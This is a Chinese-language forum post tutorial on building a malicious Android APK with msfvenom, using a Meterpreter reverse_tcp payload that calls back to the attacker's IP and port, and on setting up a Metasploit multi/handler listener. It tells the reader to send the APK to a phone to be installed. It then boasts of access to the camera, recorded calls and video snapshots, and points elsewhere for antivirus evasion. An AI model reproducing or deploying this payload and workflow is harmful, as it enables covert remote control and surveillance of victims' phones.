搜索
查看: 4154|回复: 0

METASPLOIT之安卓渗透之旅

[复制链接]

316

主题

473

帖子

1008

积分

vip用户

Rank: 6Rank: 6

积分
1008

注册会员活跃会员热心会员

QQ
发表于 2018-5-14 10:15:54 | 显示全部楼层 |阅读模式
Metasploit之安卓渗透之旅
首先打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。


 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 r>/root/123.apk 

-p 是Payload to use
Lhost 攻击者的ip,就是自己的ip
Lport 攻击者的端口,(有高端口可能不是很容易被杀的一说,本人没证实)
r>/root/123.apk 文件生成的路径及文件名
然后就是搭建自己的客户端。


 use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 4444
Exploit


是时候将恶意的APK发送到手机上。
下载>安装:

至于如何绕过免杀,请在公众号中查看详细教程。
然后我们打开后,查看MSF:

然后我们就可以为所欲为~比如看摄像头啊,截取通话语音啊,视频快照啊,当然我们是不用做违法用途的。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有没有参加CTF比赛的,一起组队啊!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表